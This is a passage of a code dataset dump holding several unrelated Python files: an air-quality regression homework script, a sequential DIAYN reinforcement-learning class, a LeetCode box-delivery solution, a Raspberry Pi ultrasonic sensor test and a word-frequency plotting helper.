Py3k has a different way to get it.\n    try:\n        trace_name = trace_fn.im_class.__name__\n    except AttributeError:\n        try:\n            trace_name = trace_fn.__self__.__class__.__name__\n        except AttributeError:\n            # A C-based function could also manifest as an f_trace value\n            # which doesn't have im_class or __self__.\n            trace_name = trace_fn.__class__.__name__\n\nprint(\"%s %s\" % (sys.argv[1], trace_name))\n","sub_path":"tests/farm/run/src/showtrace.py","file_name":"showtrace.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457421210","text":"import numpy as np\nimport csv\nimport sys\n\ndef load_data(file_name):\n    file = open(file_name, 'r', encoding='big5')\n    train_data = csv.reader(file, delimiter = ',')\n    data = [[] for i in range(18)] # keep the 18 kinds of observed measurements\n    n_row = 0\n    \n    for row in train_data:\n        if n_row != 0:\n            for i in range(3, 27, 1): # columns 3 ~ 26 hold the 24 hourly readings\n                if row[i] != 'NR':\n                    data[(n_row-1)%18].append(float(row[i]))\n                else:\n                    data[(n_row-1)%18].append(float(0))\n        n_row += 1\n\n    file.close()\n    \n    # preprocessing data\n    i = 0\n    while i < 12*20*24:\n        if data[9][i] < 0:\n            idx = i\n            while data[9][idx] < 0:\n                idx += 1\n            diff = idx - i + 1\n            for j in range(i, idx, 1):\n                data[9][j] = data[9][j-1] + (data[9][idx] - data[9][i-1]) / diff\n            i = idx + 1\n        else:\n            i += 1\n    \n    x = []\n    y = []\n    \n    for i in range(12):\n        for j in range(471):\n            x.append([])\n            for k in range(18):\n                for s in range(9):\n                    x[471*i+j].append(data[k][480*i+j+s])\n            y.append(data[9][480*i+j+9])\n    \n    x = np.array(x)\n    y = np.array(y)\n    \n    return x, y\n\ndef adagrad(x, y):\n    x = np.concatenate((np.ones((x.shape[0], 1)), x), axis = 1)\n    x_t = x.transpose()\n    \n    w = np.zeros(x.shape[1])\n    iteration = 100000\n    lr = 1\n    lamda = 0.00\n    pre_gra = np.zeros(x.shape[1])\n    \n    for i in range(1, iteration+1, 1):\n        _y = np.dot(x, w)\n        loss = _y - y + lamda * np.sum(w**2)\n        cost = np.sqrt(np.sum(loss**2) / len(x))\n        gra = 2 * np.dot(x_t, loss) + 2 * lamda * w\n        pre_gra += gra**2\n        ada = np.sqrt(pre_gra)\n        w -= lr * gra / ada\n        \n        if i % 10000 == 0:\n            print(\"iteration %d: cost = %f\" % (i, cost))\n    \n    return w\n\ndef load_file(input_file):\n    file = open(input_file, 'r', encoding='big5')\n    test_data = csv.reader(file, delimiter = ',')\n    x_test = []\n    n_row = 0\n    \n    for row in test_data:\n        if n_row % 18 == 0:\n            x_test.append([])\n        if n_row % 18 == 9:\n            for i in range(2, 11, 1):\n                if float(row[i]) < 0:\n                    if i == 2:\n                        x_test[n_row//18].append(float(row[i+1]))\n                    elif i == 10:\n                        x_test[n_row//18].append(float(row[i-1]))\n                    else:\n                        x_test[n_row//18].append((float(row[i-1]) + float(row[i+1])) / 2)\n                else:\n                    x_test[n_row//18].append(float(row[i]))\n        else:\n            for i in range(2, 11, 1):\n                if row[i] != 'NR':\n                    x_test[n_row//18].append(float(row[i]))\n                else:\n                    x_test[n_row//18].append(float(0))\n        n_row += 1\n    \n    x_test = np.array(x_test)\n    \n    return x_test\n\ndef predict(x_test):\n    w = np.load('model_best.npy')\n    x_test = np.concatenate((np.ones((x_test.shape[0], 1)), x_test), axis = 1)\n    y_test = np.dot(x_test, w)\n    \n    for i in range(len(y_test)):\n        if y_test[i] < 0:\n            y_test[i] = 0\n    \n    return y_test\n\ndef output(y_test, output_file):\n    file = open(output_file, 'w+')\n    out_file = csv.writer(file, delimiter = ',', lineterminator = '\\n')\n    out_file.writerow(['id', 'value'])\n    for i in range(len(y_test)):\n        out_file.writerow(['id_'+str(i), y_test[i]])\n    file.close()\n\n\nif __name__ == '__main__':\n#    x, y = load_data('./data/train.csv')\n#    w = adagrad(x, y)\n#    
np.save('model_best.npy', w)\n \n input_file = sys.argv[1]\n output_file = sys.argv[2]\n \n x_test = load_file(input_file)\n y_test = predict(x_test)\n output(y_test, output_file)\n ","sub_path":"hw1/hw1_best.py","file_name":"hw1_best.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635153606","text":"from typing import Any, Dict, List, Optional, Tuple, Type, Union\nimport time\nfrom types import FunctionType as function\nimport gym\nimport sys\nimport numpy as np\nfrom numpy.core.fromnumeric import mean\nimport torch as th\nfrom collections import deque\nfrom torch.nn import functional as F\nimport pathlib\nimport io\nfrom scipy.special import expit as sigm\nfrom stable_baselines3.common.save_util import (\n load_from_zip_file,\n recursive_getattr,\n recursive_setattr,\n save_to_zip_file,\n)\n\nfrom stable_baselines3.common.noise import ActionNoise\nfrom stable_baselines3.common.off_policy_algorithm import OffPolicyAlgorithm\nfrom stable_baselines3.common.type_aliases import (\n GymEnv,\n MaybeCallback,\n RolloutReturnZ,\n Schedule,\n TrainFreq,\n TrainFrequencyUnit,\n)\nfrom stable_baselines3.common.utils import (\n safe_mean,\n should_collect_more_steps,\n polyak_update,\n check_for_correct_spaces,\n)\nfrom stable_baselines3.common.base_class import BaseAlgorithm\nfrom stable_baselines3.diayn import disc\nfrom stable_baselines3.diayn.policies import DIAYNPolicy\nfrom stable_baselines3.diayn.diayn import DIAYN\nfrom stable_baselines3.common.vec_env import VecEnv\nfrom stable_baselines3.common.callbacks import BaseCallback\nfrom stable_baselines3.common.buffers import ReplayBufferZ, ReplayBufferZExternalDisc\nfrom stable_baselines3.common.exp_utils import DiscriminatorFunction\nfrom stable_baselines3.diayn.disc import Discriminator\nfrom stable_baselines3.common.utils import get_linear_fn\n\nclass SEQDIAYN(DIAYN):\n \"\"\"\n Diversity is All You Need\n Built on top of SAC\n\n :param policy: The policy model to use (MlpPolicy, CnnPolicy, ...)\n :param env: The environment to learn from (if registered in Gym, can be str)\n :param prior: The prior distribution for the skills p(z), usually uniform categorical\n :param learning_rate: learning rate for adam optimizer,\n the same learning rate will be used for all networks (Q-Values, Actor and Value function)\n it can be a function of the current progress remaining (from 1 to 0)\n :param buffer_size: size of the replay buffer\n :param learning_starts: how many steps of the model to collect transitions for before learning starts\n :param batch_size: Minibatch size for each gradient update\n :param tau: the soft update coefficient (\"Polyak update\", between 0 and 1)\n :param gamma: the discount factor\n :param train_freq: Update the model every ``train_freq`` steps. Alternatively pass a tuple of frequency and unit\n like ``(5, \"step\")`` or ``(2, \"episode\")``.\n :param gradient_steps: How many gradient steps to do after each rollout (see ``train_freq``)\n Set to ``-1`` means to do as many gradient steps as steps done in the environment\n during the rollout.\n :param action_noise: the action noise type (None by default), this can help\n for hard exploration problem. 
Cf common.noise for the different action noise type.\n :param optimize_memory_usage: Enable a memory efficient variant of the replay buffer\n at a cost of more complexity.\n See https://github.com/DLR-RM/stable-baselines3/issues/37#issuecomment-637501195\n :param ent_coef: Entropy regularization coefficient. (Equivalent to\n inverse of reward scale in the original SAC paper.) Controlling exploration/exploitation trade-off.\n Set it to 'auto' to learn it automatically (and 'auto_0.1' for using 0.1 as initial value)\n :param target_update_interval: update the target network every ``target_network_update_freq``\n gradient steps.\n :param target_entropy: target entropy when learning ``ent_coef`` (``ent_coef = 'auto'``)\n :param use_sde: Whether to use generalized State Dependent Exploration (gSDE)\n instead of action noise exploration (default: False)\n :param sde_sample_freq: Sample a new noise matrix every n steps when using gSDE\n Default: -1 (only sample at the beginning of the rollout)\n :param use_sde_at_warmup: Whether to use gSDE instead of uniform sampling\n during the warm up phase (before learning starts)\n :param create_eval_env: Whether to create a second environment that will be\n used for evaluating the agent periodically. (Only available when passing string for the environment)\n :param policy_kwargs: additional arguments to be passed to the policy on creation\n :param verbose: the verbosity level: 0 no output, 1 info, 2 debug\n :param seed: Seed for the pseudo random generators\n :param device: Device (cpu, cuda, ...) on which the code should be run.\n Setting it to auto, the code will be run on the GPU if possible.\n :param _init_setup_model: Whether or not to build the network at the creation of the instance\n :param disc_on: A list of index, or a DiscriminatorFunction or 'all'. It designates which component or\n transformation of the state space you want to pass to the discriminator.\n :param combined_rewards: whether or not you want to learn the task AND learn skills, by default this is\n False in DIAYN (unsupervised method).\n :param beta: balance parameter between the true and the diayn reward, beta = 0 means only the true reward\n is considered while beta = 1 means it's only the diversity reward. Only active when combined_rewards\n is set to True. 
beta = \"auto\" is incompatible with smerl.\n :param smerl: if not None, it sets the target value for SMERL algorithm, see https://arxiv.org/pdf/2010.14484.pdf\n :param eps: if smerl is not None, it sets the margin of the reward where under esp*smerl, DIAYN reward is\n set to 0.\n :param beta_temp: only if beta='auto', sets the temperature parameter of the sigmoid for beta computation.\n :patam beta_momentum: only if beta='auto', sets the momentum parameter for beta auto update.\n \"\"\"\n\n def __init__(\n self,\n policy: Union[str, Type[DIAYNPolicy]],\n env: Union[GymEnv, str],\n prior: th.distributions,\n learning_rate: Union[float, Schedule] = 3e-4,\n buffer_size: int = 1000000,\n learning_starts: int = 100,\n batch_size: int = 256,\n tau: float = 0.005,\n gamma: float = 0.99,\n train_freq: Union[int, Tuple[int, str]] = 1,\n gradient_steps: int = 1,\n action_noise: Optional[ActionNoise] = None,\n optimize_memory_usage: bool = True,\n ent_coef: Union[str, float] = \"auto\",\n target_update_interval: int = 1,\n target_entropy: Union[str, float] = \"auto\",\n use_sde: bool = False,\n sde_sample_freq: int = -1,\n use_sde_at_warmup: bool = False,\n tensorboard_log: Optional[str] = None,\n create_eval_env: bool = False,\n policy_kwargs: Dict[str, Any] = None,\n verbose: int = 0,\n seed: Optional[int] = None,\n device: Union[th.device, str] = \"auto\",\n _init_setup_model: bool = True,\n disc_on: Union[list, str, DiscriminatorFunction] = \"all\",\n discriminator_kwargs: dict = {},\n external_disc_shape: np.ndarray = None,\n combined_rewards: bool = False,\n beta: float = 0.01,\n smerl: int = None,\n eps: float = 0.05,\n beta_temp: float = 20.0,\n beta_momentum: float = 0.8,\n beta_smooth: bool = False,\n extra_disc_buffer: bool = True,\n extra_disc_buffer_size: int = int(1e4)\n ):\n print(learning_rate)\n\n super(SEQDIAYN, self).__init__(\n policy,\n env,\n prior,\n learning_rate=learning_rate,\n buffer_size=buffer_size,\n learning_starts=learning_starts,\n batch_size=batch_size,\n tau=tau,\n gamma=gamma,\n train_freq=train_freq,\n gradient_steps=gradient_steps,\n action_noise=action_noise,\n optimize_memory_usage=optimize_memory_usage,\n ent_coef=ent_coef,\n target_update_interval=target_update_interval,\n target_entropy=target_entropy,\n use_sde=use_sde,\n sde_sample_freq=sde_sample_freq,\n use_sde_at_warmup=use_sde_at_warmup,\n tensorboard_log=tensorboard_log,\n create_eval_env=create_eval_env,\n policy_kwargs=policy_kwargs,\n verbose=verbose,\n seed=seed,\n device=device,\n _init_setup_model=_init_setup_model,\n disc_on=disc_on,\n discriminator_kwargs=discriminator_kwargs,\n external_disc_shape=external_disc_shape,\n combined_rewards=combined_rewards,\n beta=beta,\n smerl=smerl,\n eps=eps,\n beta_temp=beta_temp,\n beta_momentum=beta_momentum,\n beta_smooth=beta_smooth,\n extra_disc_buffer=extra_disc_buffer,\n extra_disc_buffer_size=extra_disc_buffer_size,\n\n )\n\n\n\n def _setup_model(self) -> None:\n super(SEQDIAYN, self)._setup_model()\n \n out_size = 2\n self.discriminators = [Discriminator(\n self.disc_obs_shape, out_size, device=self.device, **self.discriminator_kwargs\n ) for i in range(self.n_skills)]\n \n \n\n def train(self, gradient_steps: int, batch_size: int = 64) -> None:\n # Update optimizers learning rate\n optimizers = [self.actor.optimizer, self.critic.optimizer]\n if self.ent_coef_optimizer is not None:\n optimizers += [self.ent_coef_optimizer]\n\n # Update learning rate according to lr schedule\n self._update_learning_rate(optimizers)\n\n ent_coef_losses, ent_coefs = 
deque(maxlen=1000),deque(maxlen=1000)\n actor_losses, critic_losses, disc_losses = deque(maxlen=1000),deque(maxlen=1000),deque(maxlen=1000)\n\n for gradient_step in range(gradient_steps):\n # Sample replay buffer\n replay_data = self.replay_buffer.sample(\n batch_size, env=self._vec_normalize_env\n )\n\n \n # We need to sample because `log_std` may have changed between two gradient steps\n if self.use_sde:\n self.actor.reset_noise()\n\n # Action by the current actor for the sampled state\n # We concatenate state with current one hot encoded skill\n obs = th.cat([replay_data.observations, replay_data.zs], dim=1)\n #print(\"Zs :\",replay_data.zs)\n actions_pi, log_prob = self.actor.action_log_prob(obs)\n log_prob = log_prob.reshape(-1, 1)\n\n ent_coef_loss = None\n if self.ent_coef_optimizer is not None:\n # Important: detach the variable from the graph\n # so we don't change it with other losses\n # see https://github.com/rail-berkeley/softlearning/issues/60\n ent_coef = th.exp(self.log_ent_coef.detach())\n ent_coef_loss = -(\n self.log_ent_coef * (log_prob + self.target_entropy).detach()\n ).mean()\n ent_coef_losses.append(ent_coef_loss.item())\n else:\n ent_coef = self.ent_coef_tensor\n\n ent_coefs.append(ent_coef.item())\n\n # Optimize entropy coefficient, also called\n # entropy temperature or alpha in the paper\n if ent_coef_loss is not None:\n self.ent_coef_optimizer.zero_grad()\n ent_coef_loss.backward()\n self.ent_coef_optimizer.step()\n\n with th.no_grad():\n # Select action according to policy\n # We concatenate next state with current one hot encoded skill\n new_obs = th.cat([replay_data.next_observations, replay_data.zs], dim=1)\n next_actions, next_log_prob = self.actor.action_log_prob(new_obs)\n # Compute the next Q values: min over all critics targets\n next_q_values = th.cat(self.critic_target(new_obs, next_actions), dim=1)\n next_q_values, _ = th.min(next_q_values, dim=1, keepdim=True)\n # add entropy term\n next_q_values = next_q_values - ent_coef * next_log_prob.reshape(-1, 1)\n # td error + entropy term\n target_q_values = (\n replay_data.rewards\n + (1 - replay_data.dones) * self.gamma * next_q_values\n )\n\n # Get current Q-values estimates for each critic network\n # using action from the replay buffer\n\n current_q_values = self.critic(obs, replay_data.actions)\n\n # Compute critic loss\n critic_loss = 0.5 * sum(\n [\n F.mse_loss(current_q, target_q_values)\n for current_q in current_q_values\n ]\n )\n critic_losses.append(critic_loss.item())\n\n # Optimize the critic\n self.critic.optimizer.zero_grad()\n critic_loss.backward()\n self.critic.optimizer.step()\n\n # Compute actor loss\n # Alternative: actor_loss = th.mean(log_prob - qf1_pi)\n # Mean over all critic networks\n q_values_pi = th.cat(self.critic.forward(obs, actions_pi), dim=1)\n min_qf_pi, _ = th.min(q_values_pi, dim=1, keepdim=True)\n actor_loss = (ent_coef * log_prob - min_qf_pi).mean()\n actor_losses.append(actor_loss.item())\n\n # Optimize the actor\n self.actor.optimizer.zero_grad()\n actor_loss.backward()\n self.actor.optimizer.step()\n\n # Update target networks\n if gradient_step % self.target_update_interval == 0:\n polyak_update(\n self.critic.parameters(), self.critic_target.parameters(), self.tau\n )\n\n\n if not self.extra_disc_buffer:\n replay_data_disc = replay_data\n\n else: \n replay_data_disc = self.disc_buffer.sample(\n batch_size, env=self._vec_normalize_env\n )\n\n if self.external_disc_shape:\n disc_obs = replay_data_disc.disc_obs\n \n\n else:\n # Get or compute vector to pass to the 
discriminator\n if isinstance(self.disc_on, DiscriminatorFunction):\n disc_obs = self.disc_on(replay_data_disc.observations)\n else:\n disc_obs = replay_data_disc.observations[:, self.disc_on]\n \n cur_disc = self.discriminators[self.training_skill]\n log_q_phi = cur_disc(disc_obs.to(self.device)).to(self.device)\n z = replay_data_disc.zs.to(self.device)\n c = (z.argmax(dim=1)==self.training_skill) * 1\n\n discriminator_loss = th.nn.NLLLoss()(log_q_phi, c)\n disc_losses.append(discriminator_loss.item())\n cur_disc.optimizer.zero_grad()\n discriminator_loss.backward()\n cur_disc.optimizer.step()\n\n self._n_updates += gradient_steps\n\n self.logger.record(\"train/n_updates\", self._n_updates, exclude=\"tensorboard\")\n self.logger.record(\"train/ent_coef\", np.mean(ent_coefs))\n self.logger.record(\"train/actor_loss\", np.mean(actor_losses))\n self.logger.record(\"train/critic_loss\", np.mean(critic_losses))\n self.logger.record(\"train/discriminator_loss\", np.mean(disc_losses))\n self.disc_loss = np.mean(disc_losses)\n if len(ent_coef_losses) > 0:\n self.logger.record(\"train/ent_coef_loss\", np.mean(ent_coef_losses))\n\n def learn(\n self,\n total_timesteps: int,\n callback: MaybeCallback = None,\n log_interval: int = 4,\n eval_env: Optional[GymEnv] = None,\n eval_freq: int = -1,\n n_eval_episodes: int = 5,\n tb_log_name: str = \"run\",\n eval_log_path: Optional[str] = None,\n reset_num_timesteps: bool = True,\n ) -> \"OffPolicyAlgorithm\":\n\n total_timesteps, callback = self._setup_learn(\n total_timesteps,\n eval_env,\n callback,\n eval_freq,\n n_eval_episodes,\n eval_log_path,\n reset_num_timesteps,\n tb_log_name,\n )\n\n callback.on_training_start(locals(), globals())\n self.training_skill = 0\n self.learning_starts_0 = self.learning_starts\n while self.num_timesteps < total_timesteps and self.training_skill < self.n_skills:\n \n\n\n\n # sample skill z according to prior before generating episode\n probs = th.ones(self.training_skill+1)/(self.training_skill+1)\n probs = th.nn.functional.pad(probs, [0,self.n_skills-self.training_skill-1])\n prior = th.distributions.OneHotCategorical(probs)\n z = prior.sample().to(self.device)\n\n rollout = self.collect_rollouts(\n self.env,\n train_freq=self.train_freq,\n action_noise=self.action_noise,\n callback=callback,\n learning_starts=self.learning_starts,\n replay_buffer=self.replay_buffer,\n log_interval=log_interval,\n z=z,\n disc_buffer=self.disc_buffer\n )\n if rollout.continue_training is False:\n break\n\n if self.num_timesteps > 0 and self.num_timesteps > self.learning_starts:\n # If no `gradient_steps` is specified,\n # do as many gradients steps as steps performed during the rollout\n gradient_steps = (\n self.gradient_steps\n if self.gradient_steps > 0\n else rollout.episode_timesteps\n )\n \n self.train(batch_size=self.batch_size, gradient_steps=gradient_steps)\n\n if self.training_skill == 0:\n objective = self.smerl * (1-self.eps/2)\n else:\n objective = self.smerl * (1-self.eps)\n mean_true_reward = [\n ep_info.get(f\"r_true_{self.training_skill}\")\n for ep_info in self.ep_info_buffer\n ]\n mean_true_reward = safe_mean(\n mean_true_reward, where=~np.isnan(mean_true_reward)\n )\n if np.isnan(mean_true_reward):\n mean_true_reward = 0.0\n\n if mean_true_reward >= objective and self.disc_loss < 0.1:\n\n self.learning_starts = self.num_timesteps+self.learning_starts_0\n self.replay_buffer.reset()\n self.training_skill += 1\n \n\n\n\n callback.on_training_end()\n return self\n\n \n\n def collect_rollouts(\n self,\n env: VecEnv,\n z: 
th.Tensor,\n        callback: BaseCallback,\n        train_freq: TrainFreq,\n        replay_buffer: Union[ReplayBufferZ,ReplayBufferZExternalDisc],\n        action_noise: Optional[ActionNoise] = None,\n        learning_starts: int = 0,\n        log_interval: Optional[int] = None,\n        disc_buffer = None\n    ) -> RolloutReturnZ:\n        \"\"\"\n        Collect experiences and store them into a ``ReplayBuffer``.\n\n        :param env: The training environment\n        :param z: The one hot encoding of the active skill\n        :param callback: Callback that will be called at each step\n            (and at the beginning and end of the rollout)\n        :param train_freq: How much experience to collect\n            by doing rollouts of current policy.\n            Either ``TrainFreq(<n>, TrainFrequencyUnit.STEP)``\n            or ``TrainFreq(<n>, TrainFrequencyUnit.EPISODE)``\n            with ``<n>`` being an integer greater than 0.\n        :param action_noise: Action noise that will be used for exploration\n            Required for deterministic policy (e.g. TD3). This can also be used\n            in addition to the stochastic policy for SAC.\n        :param learning_starts: Number of steps before learning for the warm-up phase.\n        :param replay_buffer:\n        :param log_interval: Log data every ``log_interval`` episodes\n        :return:\n        \"\"\"\n        diayn_episode_rewards, total_timesteps = [], []\n        observed_episode_rewards = []\n        num_collected_steps, num_collected_episodes = 0, 0\n\n        assert isinstance(env, VecEnv), \"You must pass a VecEnv\"\n        assert env.num_envs == 1, \"OffPolicyAlgorithm only support single environment\"\n        assert train_freq.frequency > 0, \"Should at least collect one step or episode.\"\n\n        if self.use_sde:\n            self.actor.reset_noise()\n\n        callback.on_rollout_start()\n        continue_training = True\n        while should_collect_more_steps(\n            train_freq, num_collected_steps, num_collected_episodes\n        ):\n            done = False\n            # we separate true rewards from self created diayn rewards\n            true_episode_reward, episode_timesteps = 0.0, 0\n            diayn_episode_reward = 0.0\n            observed_episode_reward = 0.0\n            while not done:\n\n                if (\n                    self.use_sde\n                    and self.sde_sample_freq > 0\n                    and num_collected_steps % self.sde_sample_freq == 0\n                ):\n                    # Sample a new noise matrix\n                    self.actor.reset_noise()\n\n                # Select action randomly or according to policy\n                action, buffer_action = self._sample_action(\n                    learning_starts, z, action_noise\n                )\n\n                # Rescale and perform action\n                new_obs, true_reward, done, infos = env.step(action)\n                done = done[0]\n\n\n\n                if self.external_disc_shape:\n                    disc_obs = callback.on_step()\n                else:\n                    if isinstance(self.disc_on, DiscriminatorFunction):\n                        disc_obs = self.disc_on(new_obs)\n                    else:\n                        disc_obs = new_obs[:, self.disc_on]\n                #print(disc_obs)\n\n                cur_disc = self.discriminators[z.argmax().detach().cpu()]\n                z_idx = np.argmax(z.cpu()).item()\n                if self.training_skill == z_idx:\n                    c = 1\n                else:\n                    c = 0\n                log_q_phi = (\n                    cur_disc(disc_obs)[:, 1].detach().cpu().numpy()\n                )\n\n\n\n                if isinstance(self.log_p_z, th.Tensor):\n                    self.log_p_z = self.log_p_z.cpu().numpy()\n\n                log_p_z = np.log([z_idx/(z_idx+1)+1e-10, 1/(z_idx+1)])\n                diayn_reward = log_q_phi - log_p_z[1]\n\n\n\n                # beta update and logging\n                if self.combined_rewards:\n                    if self.beta == \"auto\":\n                        \n                        \"\"\"\n                        mean_diayn_reward = [\n                            ep_info.get(f\"r_diayn_{z_idx}\")\n                            for ep_info in self.ep_info_buffer\n                        ]\n                        mean_diayn_reward = safe_mean(\n                            mean_diayn_reward, where=~np.isnan(mean_diayn_reward)\n                        )\n                        mean_true_reward = [\n                            ep_info.get(f\"r_true_{z_idx}\")\n                            for ep_info in self.ep_info_buffer\n                        ]\n                        mean_true_reward = safe_mean(\n                            mean_true_reward, where=~np.isnan(mean_true_reward)\n                        )\n                        if np.isnan(mean_true_reward):\n                            mean_true_reward = 0.0\n                        if 
np.isnan(mean_diayn_reward):\n mean_diayn_reward = 0.0\n last_beta = self.beta_buffer[-1][z_idx]\n beta = (\n sigm(\n (mean_true_reward - mean_diayn_reward) / self.beta_temp\n )\n * (1 - self.beta_momentum)\n + last_beta * self.beta_momentum\n )\n reward = beta * diayn_reward + (1 - beta) * true_reward\n betas = self.beta_buffer[-1].copy()\n betas[z_idx] = beta\n self.beta_buffer.append(betas)\n \"\"\" \n\n\n\n\n elif self.smerl:\n mean_true_reward = [\n ep_info.get(f\"r_true_{z_idx}\")\n for ep_info in self.ep_info_buffer\n ]\n\n\n mean_true_reward = safe_mean(\n mean_true_reward, where=~np.isnan(mean_true_reward)\n )\n\n\n if np.isnan(mean_true_reward):\n mean_true_reward = 0.0\n\n if self.beta_smooth :\n a = self.smerl+np.abs(self.eps * self.smerl)\n beta_on = self.beta * sigm(mean_true_reward*2/a - 2)\n else:\n beta_on = float(\n (\n mean_true_reward\n >= self.smerl - np.abs(self.eps * self.smerl)\n ) * self.beta\n )\n betas = self.beta_buffer[-1].copy()\n betas[z_idx] = beta_on\n self.beta_buffer.append(betas)\n # add beta*diayn_reward if mean_reward is closer than espilon*smerl to smerl\n reward = diayn_reward * beta_on + true_reward\n else:\n reward = self.beta * diayn_reward + true_reward\n\n else:\n reward = diayn_reward\n\n self.num_timesteps += 1\n episode_timesteps += 1\n num_collected_steps += 1\n\n # Give access to local variables\n callback.update_locals(locals())\n # Only stop training if return value is False, not when it is None.\n \n if callback.on_step() is False:\n return RolloutReturnZ(\n 0.0,\n num_collected_steps,\n num_collected_episodes,\n continue_training=False,\n z=z,\n )\n\n true_episode_reward += true_reward\n diayn_episode_reward += diayn_reward\n observed_episode_reward += reward\n\n # Retrieve reward and episode length if using Monitor wrapper\n for idx, info in enumerate(infos):\n #print(\"Before\",info)\n maybe_ep_info = info.get(\"episode\")\n if maybe_ep_info:\n for i in range(self.prior.event_shape[0]):\n maybe_ep_info[f\"r_diayn_{i}\"] = np.nan\n maybe_ep_info[f\"r_true_{i}\"] = np.nan\n if self.combined_rewards:\n if self.beta == \"auto\" or self.smerl:\n maybe_ep_info[f\"beta_{i}\"] = betas[i]\n maybe_ep_info[f\"r_diayn_{z_idx}\"] = diayn_episode_reward[0]\n maybe_ep_info[f\"r_true_{z_idx}\"] = true_episode_reward[0]\n maybe_ep_info[\"r\"] = observed_episode_reward[0]\n #print(\"After\",info)\n\n self._update_info_buffer(infos, done)\n\n # Store data in replay buffer (normalized action and unnormalized observation)\n z_store = z.clone().detach().cpu().numpy()\n\n if self.external_disc_shape:\n self._store_transition(\n replay_buffer, buffer_action, new_obs, reward, done, infos, z_store, disc_obs\n )\n\n if disc_buffer:\n self._store_transition(\n disc_buffer, buffer_action, new_obs, reward, done, infos, z_store, disc_obs\n )\n\n\n else:\n self._store_transition(\n replay_buffer, buffer_action, new_obs, reward, done, infos, z_store\n )\n\n if disc_buffer:\n self._store_transition(\n disc_buffer, buffer_action, new_obs, reward, done, infos, z_store\n )\n\n\n self._update_current_progress_remaining(\n self.num_timesteps, self._total_timesteps\n )\n\n # For DQN, check if the target network should be updated\n # and update the exploration schedule\n # For SAC/TD3, the update is done as the same time as the gradient update\n # see https://github.com/hill-a/stable-baselines/issues/900\n self._on_step()\n\n if not should_collect_more_steps(\n train_freq, num_collected_steps, num_collected_episodes\n ):\n break\n\n if done:\n num_collected_episodes += 1\n 
self._episode_num += 1\n diayn_episode_rewards.append(diayn_episode_reward)\n total_timesteps.append(episode_timesteps)\n\n if action_noise is not None:\n action_noise.reset()\n\n # Log training infos\n if log_interval is not None and self._episode_num % log_interval == 0:\n self._dump_logs()\n\n diayn_mean_reward = (\n np.mean(diayn_episode_rewards) if num_collected_episodes > 0 else 0.0\n )\n callback.on_rollout_end()\n #print(diayn_episode_rewards)\n return RolloutReturnZ(\n diayn_mean_reward,\n num_collected_steps,\n num_collected_episodes,\n continue_training,\n z=z,\n )","sub_path":"stable_baselines3/diayn/seq_diayn.py","file_name":"seq_diayn.py","file_ext":"py","file_size_in_byte":30298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298402052","text":"from typing import List\nfrom collections import deque\n\nclass Solution:\n def boxDelivering(self, boxes: List[List[int]], portsCount: int, maxBoxes: int, maxWeight: int) -> int:\n def getArray() -> List[int]:\n return [0] * (n + 1)\n \n n = len(boxes)\n p, w, neg, W = getArray(), getArray(), getArray(), getArray()\n\n for i in range(1, n + 1):\n p[i], w[i] = boxes[i - 1]\n if i > 1:\n neg[i] = neg[i - 1] + (p[i - 1] != p[i])\n W[i] = W[i - 1] + w[i]\n \n opt = deque([0])\n f, g = getArray(), getArray()\n \n for i in range(1, n + 1):\n while i - opt[0] > maxBoxes or W[i] - W[opt[0]] > maxWeight:\n opt.popleft()\n \n f[i] = g[opt[0]] + neg[i] + 2\n \n if i != n:\n g[i] = f[i] - neg[i + 1]\n while opt and g[i] <= g[opt[-1]]:\n opt.pop()\n opt.append(i)\n \n return f[n]\n\nif __name__ == \"__main__\":\n boxes = [[1,1],[2,1],[1,1]]\n portsCount = 2\n maxBoxes = 3\n maxWeight = 3\n print(Solution().boxDelivering(boxes, portsCount, maxBoxes, maxWeight))\n","sub_path":"src/1687. 
Delivering Boxes from Storage to Ports/1687.py","file_name":"1687.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95508403","text":"import RPi.GPIO as GPIO\nimport time\n\ntrigger = 19\necho = 26\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(trigger, GPIO.OUT)\nGPIO.setup(echo, GPIO.IN)\n\ndef distanz():\n\tGPIO.output(trigger, GPIO.HIGH)\n\ttime.sleep(0.00001)\n\tGPIO.output(trigger, GPIO.LOW)\n\n\twhile GPIO.input(echo) == 0:\n\t\tStartZeit = time.time()\n\twhile GPIO.input(echo) == 1:\n\t\tStopZeit = time.time()\n\tZeit = StopZeit - StartZeit\n\tdistanz = (Zeit * 34300) / 2\n\treturn distanz\n\ntry:\n\twhile True:\n\t\tabstand = distanz()\n\t\tprint(\"Measured distance = %.1f cm\" % abstand)\n\t\ttime.sleep(1)\n\nexcept KeyboardInterrupt:\n\tprint(\"Measurement stopped by the user\")\n\tGPIO.cleanup()","sub_path":"Python/Raspberry Pi 3/Programs/Parkhaus/Test_Ultrasonic.py","file_name":"Test_Ultrasonic.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210068135","text":"import matplotlib.pyplot as plt\n\n\ndef print_dict(dict):\n    nb = 0\n    for value in dict:\n        nb = nb + value[1]\n        print(\"Word:\", value[0], \", occurrence:\", value[1])\n    print(\"Total words: \", nb)\n\n\ndef graph(dict, nb, win_x, win_y, filename):\n    print_dict(dict)\n    words = []\n    number = []\n    i = 0\n    if nb > len(dict):\n        nb = len(dict)\n    while i < nb:\n        words.append(dict[i][0])\n        number.append(dict[i][1])\n        i += 1\n    plt.figure(figsize=(win_x, win_y))\n    plt.plot(words, number)\n    graph_name = \"Number of word occurrence in \" + filename\n    plt.title(graph_name)\n    plt.ylabel('Occurrences')\n    plt.xlabel('Words')\n    plt.show()\n    plt.close()","sub_path":"src/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96390409","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nfrom cycler import cycler\n\nfrom pmmif import featherpmm\n\nfrom gen import sim_dist, sim_week, add_actual\n\nBLUE = 